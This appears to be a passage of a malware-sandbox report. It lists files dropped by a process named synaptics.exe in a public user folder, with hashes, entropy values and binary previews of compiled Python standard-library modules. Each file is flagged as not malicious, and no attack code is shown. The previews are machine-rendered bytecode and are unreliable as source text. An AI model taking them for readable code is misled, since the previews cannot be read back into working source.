                                                                                                                                                                                                                                  SSDEEP:192:WJq1+Bd5hSIQIWWvBMKumwKZdlXiWQA3LYPqOW9PJFoKzckOMsj9XCCDH:WJqCLSIQ2OKuuZrXiWQA0shzJaYWH
                                                                                                                                                                                                                                  MD5:89D0ED91028B8079BAE446113D819704
                                                                                                                                                                                                                                  SHA1:ADAC6F8BA6DB7E7226A531049210F17FA0280186
                                                                                                                                                                                                                                  SHA-256:A0B64D68912646643A7DFFC1B2462CC3E7C024BD9EFF719CC02197702046FBE9
                                                                                                                                                                                                                                  SHA-512:A697B9A3FE33076B2477A44649560A8BEF11D56CD83CDB273671A795E150A71071D1B8FA24FF6C6486485C7B89E53A9DF544CFB379C7CC4297997DE30EAB72DA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dZ@.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.e.d.e.....G.d.d...d.e...Z.e.d.e.....G.d.d...d.e...Z.e.d.e.....G.d.d...d...Z.G.d.d...d...Z.z.e...W.n...e.y.......e.Z.Y.n.w.G.d.d...d...Z.d.S.).z+.csv.py - read/write/investigate CSV files......N)...Error..__version__..writer..reader..register_dialect..unregister_dialect..get_dialect..list_dialects..field_size_limit..QUOTE_MINIMAL..QUOTE_ALL..QUOTE_NONNUMERIC..QUOTE_NONE..__doc__)...Dialect)...StringIO).r....r....r....r....r....r....r......excel..excel_tabr....r....r....r....r....r......Snifferr....r......DictReader..DictWriter..unix_dialectc....................@...sD...e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.).r....z.Describe a CSV dialect... This must be subclassed (see csv.excel). Valid attributes are:. delimiter, quotechar, escapechar, doublequote, skipinitialspace,.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):56544
                                                                                                                                                                                                                                  Entropy (8bit):5.2501757794184485
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:NoPNdGbiwEyaNVxLZnkM238oZMpj6355j9RsFdVY:NWF1LMP5
                                                                                                                                                                                                                                  MD5:7C12097F4F867AD4B4997C1994641C9C
                                                                                                                                                                                                                                  SHA1:04A32F29EB00F027F487F840D791FC544FABB297
                                                                                                                                                                                                                                  SHA-256:557E8764DCA6C36634794C175F7912EA1F4BCEDFB22FCA6C528599706FBB5FF4
                                                                                                                                                                                                                                  SHA-512:778C1C3E842226CF679781EDB6893F339658C8E86EBE8064FE0B992B0C24F4FBE517B7BF7FFA9C24052B02DD490F1DB7884B0AB66FF35B166AC641B8B89FD22C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.a.......................@...sr...d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.Z.d.Z.d.Z.g.d...Z.d.g.Z.d.Z.e.d.d.....D.].Z.e...e.....e.e.7.Z.q/[.[.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d.k.scJ...e.d.e...d...k.smJ...e.d.e...d...k.swJ...d.d...Z.g.d...Z.g.d...Z.d d!..Z.d\d#d$..Z.d%d&..Z d'd(..Z!d)d*..Z"d+d,..Z#d-d...Z$d/d0..Z%d1d2..Z&d3d4..Z'd5d6..Z(d7d8..Z)d9d:..Z*d;d<..Z+G.d=d>..d>..Z,e,d?..e,_-e,d@dAdBdBdCdD..e,_.e,d.dE..e,_/G.dFdG..dG..Z0e0Z1e0d.d.d...e0_-e0d.dHdI..e0_.e,d.dJ..e0_/G.dKdL..dL..Z2G.dMdN..dNe3..Z4e4Z5[4e2Z6G.dOdP..dP..Z.e.Z7e.d.d.d...e._-e.dAdBdBdC..e._.e,d.dE..e._/G.dQdR..dRe0..Z8e8d.d.d...e8_-e8d.dHdIdAdBdBdC..e8_.e,d.dE..e8_/dSdT..Z9G.dUdV..dVe2..Z:e:.;e,d.....e:_<e:.;e,dAdBdW......e:_-e:.;e,dAdBdW....e:_.e8dXd.d.e:j<dY..Z=z.d.dZl>T.W.n...e?..y.......Y.d.S.w.[.[.[.[.[.[.[=[.[.[.['[([)[%[&[.[*[1[.[.[.[.[ [.[.[9[.[.[.[7[6[![.[+["[$[#[5d.d[l>m.Z...d.S.)]z.Concrete date/time and related types...See http://www.iana.org/time-
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):26074
                                                                                                                                                                                                                                  Entropy (8bit):5.285956873463293
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:EOTKcmNJ6I61HjkGoQEARW5nV3j412nrp+6s8LY4F8AGK/h3Ec:EaGNJgJEARW3Ea+VZ4F8AGK/Wc
                                                                                                                                                                                                                                  MD5:B42816F55E53D5D4688939DCB53A704C
                                                                                                                                                                                                                                  SHA1:3CB176D0EB321EB155D21E71B764A4EACFE6312F
                                                                                                                                                                                                                                  SHA-256:697D08C263D3718762608C154D82E865AD06A0F5B53B264322C55EC18A9EDF91
                                                                                                                                                                                                                                  SHA-512:D2E401CBAEDDA1C484762DCDF44BE10331B1D438206CA739DF5456141AD4F7CA7926CC70BA5C388B19B4B278D8531B0929AA5232E673969BD2888119050B569E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.d.l.Z.d.d.l.m.Z.m.Z...g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e.d...Z.G.d.d...d.e.e...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.d.d ..Z.d!d"..Z.d#d$..Z.d.S.)%.....N)...MappingProxyType..DynamicClassAttribute)...EnumMeta..Enum..IntEnum..Flag..IntFlag..auto..uniquec....................C...s....t.|.d...p.t.|.d...p.t.|.d...S.).z?. Returns True if obj is a descriptor, False otherwise.. ..__get__..__set__..__delete__)...hasattr)...obj..r.....&C:\Users\Public\M20EKMMEH2\lib\enum.py.._is_descriptor....s..............r....c....................C...sL...t.|...d.k.o%|.d.d.....|.d.d.........k.o.d.k.n.....o%|.d...d.k.o%|.d...d.k.S.).z=. Returns True if a __dunder__ name, False otherwise.. .....N..........Z.__.._.........len....namer....r....r......_is_dunder....s......&...........r....c....................C...sL...t.|...d.k.o%|.d...|.d.......k.o.d.k.n.....o%|.d.d...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4255
                                                                                                                                                                                                                                  Entropy (8bit):5.6678545580929836
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:rZ1NvFl7gPHn5gns99V7Ry+/63Tq7Y1qYmWVzHRJwZLaL1iCtiOy9:r1vFl7g/SnsV7g7HzTRbdUV
                                                                                                                                                                                                                                  MD5:1B2B2224EB05DA1357931A7BEFAAFA3A
                                                                                                                                                                                                                                  SHA1:504B41A28DF015F31CD3517CB23C49C84A33A8CB
                                                                                                                                                                                                                                  SHA-256:36DD723644AB65D18596DBD465DD7F2B0F88F2E5F99F525802793C56D7040610
                                                                                                                                                                                                                                  SHA-512:F11A746DE36AB651A2C1C5B9B6DA1248413B2E810421BCFA1245C2EF7DBA2C071844E5D6657B666FFFC2C5360EE9C202D622B0CCC9C9CBF6B408AF0439D94DE3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s|...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d.l.m.Z...e...j.Z.[.d.d...Z.e.j.d.d.d...d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.S.).a....Filename matching with shell patterns...fnmatch(FILENAME, PATTERN) matches according to the local convention..fnmatchcase(FILENAME, PATTERN) always takes case in account...The functions operate by translating the pattern into a regular.expression. They cache the compiled regular expressions for speed...The function translate(PATTERN) returns a regular expression.corresponding to PATTERN. (It does not compile it.)......N)...filter..fnmatch..fnmatchcase..translate)...countc....................C...s"...t.j...|...}.t.j...|...}.t.|.|...S.).a....Test whether FILENAME matches PATTERN... Patterns are Unix shell style:.. * matches everything. ? matches any single character. [seq] matches any character in seq. [!seq] matches any char not in seq.. An initial period in FILENAME is not spec
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):28346
                                                                                                                                                                                                                                  Entropy (8bit):5.346465244882475
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:8oO3KwjQNi3/sZoyIw/kj5N4V+xIhb85NxshpCzCLF:8o1MQNi30Cj5iV+0b853IMmLF
                                                                                                                                                                                                                                  MD5:C6A0A2CAC3CA1E5E9409AAF9662D624E
                                                                                                                                                                                                                                  SHA1:2E2CF528E44F0C2CCB40133612CE09D0625AFC34
                                                                                                                                                                                                                                  SHA-256:14469C7772565C447A1861F482EA51C8BACF5617D2BD8C91033EED852EF3574F
                                                                                                                                                                                                                                  SHA-512:9175C5613FA45ADFAB5E02C48DDDAE056BC34E757BBBB1F60E5FF77A89A916940ECDB3C324768588C48F7C8F8604ECEBE768AB7CE3FB816DE4D685B4678F0F79
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e.e.f.d.d...Z.e.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d d!..Z.e.f.d"d#..Z.e.f.d$d%..Z.d&e.f.d'e.f.d(e.f.g.d(e.f.d)e.f.d&e.f.g.d)e.f.d(e.f.d'e.f.g.d'e.f.d&e.f.d)e.f.g.d*..Z.d+d,..Z.d-d...Z.z.d.d/l m.Z...W.n...e!y.......Y.n.w.e"..Z#e#f.d0d1..Z$z.d.d2l m$Z$..W.n...e!y.......Y.n.w.G.d3d4..d4..Z%z.d.d5l m%Z%..W.n...e!y.......Y.n.w.G.d6d7..d7e"..Z&d8d9..Z'e.d:g.d;....Z(G.d<d=..d=e)..Z*e"..f.e+e,h.e-e.e/f.d>d?..Z0dXdBdC..Z1dDdE..Z2z.d.dFl m2Z2..W.n...e!..y;......Y.n.w.dGdH..Z3dIdJ..Z4dYdLdM..Z5dNdO..Z6dPdQ..Z7dRdS..Z8G.dTdU..dU..Z9e"..Z:G.dVdW..dW..Z;dKS.)ZzEfunctools.py - Tools for working with functions and callable objects.)...update_wrapper..wraps..WRAPPER_ASSIGNMENTS..WRAPPER_UPDATES..total_ordering..cache..cmp_to_key..lru_cache..reduce..partial..partialmethod..singledispatch..si
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3918
                                                                                                                                                                                                                                  Entropy (8bit):5.1765688067672775
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:uqsfAs4EvzosntVf4/zsSQ1ow+2U/tAaDKDj51dmvuoZ:Fs4itKyow8/tjgqWoZ
                                                                                                                                                                                                                                  MD5:F3543CEAF318D4B4AF7F020486AA3469
                                                                                                                                                                                                                                  SHA1:165DB8D4A8CE772A17C177944EA774D5785723E8
                                                                                                                                                                                                                                  SHA-256:07247A3A1042878BD0C93E357AB0AE6935051C113394B91DED33180C987B2E62
                                                                                                                                                                                                                                  SHA-512:203BAA37518117E0B01EEB8BCC669AC3EFBD6EAC8063B9F75C64135047D8510D78A133F35E954B1D6E5E437EF8725D78EA6959767A15EB9B481336E005E4C25C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z..Path operations common to more than one OS.Do not use directly. The OS specific modules import the appropriate.functions from this module themselves.......N)...commonprefix..exists..getatime..getctime..getmtime..getsize..isdir..isfile..samefile..sameopenfile..samestatc....................C...s*...z.t...|.....W.d.S...t.t.f.y.......Y.d.S.w.).zDTest whether a path exists. Returns False for broken symbolic linksFT)...os..stat..OSError..ValueError)...path..r.....-C:\Users\Public\M20EKMMEH2\lib\genericpath.pyr........s................r....c....................C....4...z.t...|...}.W.n...t.t.f.y.......Y.d.S.w.t...|.j...S.).z%Test whether a path is a regular fileF).r....r....r....r......S_ISREG..st_mode).r......str....r....r....r.........................r....c....................C...r....).z<Return true if th
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6856
                                                                                                                                                                                                                                  Entropy (8bit):5.597514979475414
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:IdPjhwzUgQUdROKh0WXI7dQia/kD6s2rt6iojyyt8NQCcx54bNdO9DF4irm/tMmh:IRmE5+odQiaMDJ2tv4OmVP/4XbJ4nJ0
                                                                                                                                                                                                                                  MD5:17A483B169622B4D1B6188A6804A655F
                                                                                                                                                                                                                                  SHA1:EAEC1681B7FD1DB60337EE3E126B2FBF2084C0C9
                                                                                                                                                                                                                                  SHA-256:484BA1D1DE475C4876B98B218CDE1148BA2E6F8DADFF12707102A958982BBA96
                                                                                                                                                                                                                                  SHA-512:F0B58A9B23A3988672E7623A6052F92F7FE734215FA8E6424ED2601A1A728246F0E2DCCB86B790957CAEBD0B6990DF459D8906322D738293CCCA8212386176C1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.).......................@...sl...d.Z.d.Z.e.e...Z.e.e...Z.e.d...Z.i.Z.d.d.h.Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.z.d.d.l.Z.e.Z.e.Z.e...e.j...Z.W.n...e.yG......d.Z.e.Z.e.Z.Y.n.w.z.d.d.l.m.Z...W.n*..e.yz......d.d.l.m.Z...e.d.d...e.d...D.....Z.e.d.d...e.d...D.....Z.d.d.d...Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y.......Y.n.w.e.D.].Z.z.e.e...e...e.<.W.q...e.y.......d.d.l.Z.e...d.e.....Y.q.w.[.[.[.[.[.[.d.S.).a3...hashlib module - A common interface to many hash functions...new(name, data=b'', **kwargs) - returns a new hash object implementing the. given hash function; initializing the hash. using the given binary data...Named constructor functions are also available, these are faster.than using new(name):..md5(), sha1(), sha224(), sha256(), sha384(), sha512(), blake2b(), blake2s(),.sha3_224, sha3_256, sha3_384, sha3_512, shake_128, and shake_256...More algorithms may be available on your platform but the above are guaranteed
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13876
                                                                                                                                                                                                                                  Entropy (8bit):5.35456999206203
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ynqTYZnQtot7ItafyjjWya/PX6FGRxibJWiTqe0hN2leov+Ugn:ynEYZn0ot7It7j3aX6gRxiM0uN2kk+/n
                                                                                                                                                                                                                                  MD5:BF809D4B6A59C3B08A3D1CBEB404F7D3
                                                                                                                                                                                                                                  SHA1:FF93B7021A5217359CA2430F3EDFC278DB6B766E
                                                                                                                                                                                                                                  SHA-256:36BB5EE0B57EE6409BB4EA76D15ECFC47F71264164CC05BFA1F10AE48844370F
                                                                                                                                                                                                                                  SHA-512:4E2322C46672AB2C042E54BE1BE3B78C65AA6F00D1B7179DB71DED35D4E0D293600108E136BD32D07570005DDE213F9BA50E73FBB66BE2D859F1845AEA5CE100
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.[.......................@...sD...d.Z.d.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...d.d...Z.d*d d!..Z.d*d"d#..Z.z.d$d%l.T.W.n...e.yY......Y.n.w.z.d$d&l.m.Z...W.n...e.yk......Y.n.w.z.d$d'l.m.Z...W.n...e.y}......Y.n.w.z.d$d(l.m.Z...W.n...e.y.......Y.n.w.e.d)k.r.d$d.l.Z.e.e.........d.S.d.S.)+a....Heap queue algorithm (a.k.a. priority queue)...Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for.all k, counting elements from 0. For the sake of comparison,.non-existing elements are considered to be infinite. The interesting.property of a heap is that a[0] is always its smallest element...Usage:..heap = [] # creates an empty heap.heappush(heap, item) # pushes a new item on the heap.item = heappop(heap) # pops the smallest item from the heap.item = heap[0] # smallest item on the heap without popping it.heapify(x) # transforms list into a heap, in-place, in linear time
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6984
                                                                                                                                                                                                                                  Entropy (8bit):5.298296736755448
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:L/FTSdeLSo3yfjb/3xXrCx5PgT1nxc203AbC:L/FT0eLhyX1K5S1nv0QbC
                                                                                                                                                                                                                                  MD5:7C213842B50E304FC30E098FF86273D0
                                                                                                                                                                                                                                  SHA1:9AA65E3FDC89CB7688AB8ED9DAF83812BF3DA220
                                                                                                                                                                                                                                  SHA-256:58DE983F84F3DFA6C5F4113C1C7FAD5E9B02510B845EEA72DF440550C47402C4
                                                                                                                                                                                                                                  SHA-512:F5F8DE7E714CE56472F003B8B48F3E8BE925D064C0E7D4F408E37A2E2D302E3ED790762DAFCA383180A8C1293C88F77AFBDEC769E945C5F12642852970726C7E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y.......d.Z.d.Z.d.d.l.m.Z...Y.n.w.e.j.Z.e.e.j...Z.d.d.l.Z.e.d.d...e.d...D.....Z.e.d.d...e.d...D.....Z.d.Z.G.d.d...d...Z.d.d.d...Z.d.d...Z.d.S.).zqHMAC (Keyed-Hashing for Message Authentication) module...Implements the HMAC algorithm as described by RFC 2104.......N)..._compare_digestc....................c..........|.].}.|.d.A.V...q.d.S.)..\...N.......0..xr....r.....&C:\Users\Public\M20EKMMEH2\lib\hmac.py..<genexpr>.............r.........c....................c...r....)..6...Nr....r....r....r....r....r........r....c....................@...sf...e.Z.d.Z.d.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...HMACz~RFC 2104 HMAC class. Also complies with RFC 4231... This supports the API for Cryptographic Hash Functions (PEP 247).. .@...)..._hmac.._inner.._outer..block_size..digest_sizeN..c....................C...s....t.|.t.t.f...s.t.d.t.|...j.......|.s.t.d.....t.r<t.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3674
                                                                                                                                                                                                                                  Entropy (8bit):5.398327365740386
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:7jeBVAsKEv1YlurRNZsmi/VA61vWF/3+XIQjC2Ai3QuAXuhgwGnvPOcGcMzzMfSd:7UK0iSxOmoWF2vLAy/hyvP7GcmYa7RXn
                                                                                                                                                                                                                                  MD5:8C59BC5474F13E004265B60E1733BF90
                                                                                                                                                                                                                                  SHA1:118F2B06DF232081934CB2F8C094FA5D8E76569C
                                                                                                                                                                                                                                  SHA-256:8DFD78C904728EE31476A109CCA6A8DEA5870E7C5DD46740880293DDCA502F51
                                                                                                                                                                                                                                  SHA-512:355F3FFF44074A03047B3A2EAB2A429071855003ED4866FEA562525657A04C9D3FE418796E4DF4CFFE778F653C367445B7C62190041CAD036A51065D486FF467
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sH...d.Z.d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d...Z.d.e._.d.Z.d.Z.d.Z.G.d.d...d.e.j.e.j.d...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j e...Z!e.."e.....e.e.e.e.e.f.D.].Z#e.."e#....que.e.f.D.].Z#e!."e#....q.[#z.d.d.l.m$Z$..W.n...e%y.......Y.d.S.w.e.."e$....d.S.).a....The io module provides the Python interfaces to stream handling. The.builtin open function is defined in this module...At the top of the I/O hierarchy is the abstract base class IOBase. It.defines the basic interface to a stream. Note, however, that there is no.separation between reading and writing to streams; implementations are.allowed to raise an OSError if they do not support a given operation...Extending IOBase is RawIOBase which deals simply with the reading and.writing of raw bytes to a stream. FileIO subclasses RawIOBase to provide.an interface to OS files...BufferedIOBase deals with buffering on a raw
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):61462
                                                                                                                                                                                                                                  Entropy (8bit):5.306612444561431
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:1kqqs3deqQmjuqJqq9qhIOGqaqzIVqOq/sqmqeXWqJqZqoqfqEqNqqBNqzSq2qfe:BamjPaWNFGc81veYm1o4Jg5wLlf8x7LR
                                                                                                                                                                                                                                  MD5:F3772A341BB874C24D71EDB76D6FCBAD
                                                                                                                                                                                                                                  SHA1:D662817A4AC74F774CC73C706F99339812AE4216
                                                                                                                                                                                                                                  SHA-256:351A1AE96F446050ED3A2EF6789387E31AD6C083018AD48FB2D6EB07A03675BD
                                                                                                                                                                                                                                  SHA-512:EC81CE7F0152EBA4F00636EEAF63ABA2BCD0F156E9D85C407E6864E40BD13574428A533016FD68EB6825A018B48CFAB4946E05FA6989AA5286CB66515454CB0C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.,.......................@...s....d.Z.d.Z.d.d.l.Z.d.Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.d...Z.d=d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.G.d#d$..d$..Z.d.a.e.j.G.d%d&..d&e.....Z.e.j.G.d'd(..d(e.....Z.G.d)d*..d*..Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e.e...Z.G.d1d2..d2..Z.e.e._.G.d3d4..d4..Z.G.d5d6..d6e.e...Z G.d7d8..d8e ..Z!G.d9d:..d:e.e...Z"G.d;d<..d<..Z#e#e _.d.S.)>z.A fast, lightweight IPv4/IPv6 manipulation library in Python...This library is used to create/poke/manipulate IPv4 and IPv6 addresses.and networks...z.1.0.....N. .......c....................@........e.Z.d.Z.d.Z.d.S.)...AddressValueErrorz%A Value Error related to the address.N....__name__..__module__..__qualname__..__doc__..r....r.....+C:\Users\Public\M20EKMMEH2\lib\ipaddress.pyr.................r....c....................@...r....)...NetmaskValueErrorz%A Value Error related to the netmask.Nr....r....r....r....r....r........r....r....c..................
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):61462
                                                                                                                                                                                                                                  Entropy (8bit):5.306612444561431
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:1kqqs3deqQmjuqJqq9qhIOGqaqzIVqOq/sqmqeXWqJqZqoqfqEqNqqBNqzSq2qfe:BamjPaWNFGc81veYm1o4Jg5wLlf8x7LR
                                                                                                                                                                                                                                  MD5:F3772A341BB874C24D71EDB76D6FCBAD
                                                                                                                                                                                                                                  SHA1:D662817A4AC74F774CC73C706F99339812AE4216
                                                                                                                                                                                                                                  SHA-256:351A1AE96F446050ED3A2EF6789387E31AD6C083018AD48FB2D6EB07A03675BD
                                                                                                                                                                                                                                  SHA-512:EC81CE7F0152EBA4F00636EEAF63ABA2BCD0F156E9D85C407E6864E40BD13574428A533016FD68EB6825A018B48CFAB4946E05FA6989AA5286CB66515454CB0C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.,.......................@...s....d.Z.d.Z.d.d.l.Z.d.Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.d...Z.d=d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.G.d#d$..d$..Z.d.a.e.j.G.d%d&..d&e.....Z.e.j.G.d'd(..d(e.....Z.G.d)d*..d*..Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e.e...Z.G.d1d2..d2..Z.e.e._.G.d3d4..d4..Z.G.d5d6..d6e.e...Z G.d7d8..d8e ..Z!G.d9d:..d:e.e...Z"G.d;d<..d<..Z#e#e _.d.S.)>z.A fast, lightweight IPv4/IPv6 manipulation library in Python...This library is used to create/poke/manipulate IPv4 and IPv6 addresses.and networks...z.1.0.....N. .......c....................@........e.Z.d.Z.d.Z.d.S.)...AddressValueErrorz%A Value Error related to the address.N....__name__..__module__..__qualname__..__doc__..r....r.....+C:\Users\Public\M20EKMMEH2\lib\ipaddress.pyr.................r....c....................@...r....)...NetmaskValueErrorz%A Value Error related to the netmask.Nr....r....r....r....r....r........r....r....c..................
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):938
                                                                                                                                                                                                                                  Entropy (8bit):5.417023053262535
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:TBMgKEVTSAvFwzVCI0L67avc0Kb4S0bJB6R/k++Yu:TzVu8wzVmxcZt0bJB65h+N
                                                                                                                                                                                                                                  MD5:489E9FEB01DE83CBC8AC603C45C2571B
                                                                                                                                                                                                                                  SHA1:A28C29677A3250B97C48C570795665E3BF05B157
                                                                                                                                                                                                                                  SHA-256:D09EBD262D872B6428ED49448CBBDCFFB7BA1AEC6D39150A33A0F611A7F92A56
                                                                                                                                                                                                                                  SHA-512:39284EC168A43362944F021CD2676719894F6D42FFF6E6EC8F0391BF9D3677820506E2471A1FA6680C6699A3FFC26FF781A540CB6BD7D79431C57F71FEA2D52F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dd........................@...s4...d.Z.g.d...Z.g.d...Z.g.d...Z.e.e...j.Z.e.e...j.Z.d.S.).a....Keywords (from "Grammar/python.gram")..This file is automatically generated; please don't muck it up!..To update the symbols in this file, 'cd' to the top directory of.the python source tree and run:.. PYTHONPATH=Tools/peg_generator python3 -m pegen.keywordgen Grammar/python.gram Grammar/Tokens Lib/keyword.py..Alternatively, you can run 'make regen-keyword'..)...iskeyword..issoftkeyword..kwlist..softkwlist)#..False..None..TrueZ.andZ.asZ.assertZ.asyncZ.awaitZ.breakZ.classZ.continueZ.defZ.delZ.elifZ.elseZ.exceptZ.finallyZ.forZ.fromZ.globalZ.ifZ.import..inZ.is..lambdaZ.nonlocalZ.notZ.orZ.passZ.raise..returnZ.tryZ.whileZ.withZ.yield)..._Z.case..matchN)...__doc__..__all__r....r......frozenset..__contains__r....r......r....r.....)C:\Users\Public\M20EKMMEH2\lib\keyword.py..<module>....s...........&....
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4153
                                                                                                                                                                                                                                  Entropy (8bit):5.325976983701888
                                                                                                                                                                                                                                  Encrypted:false
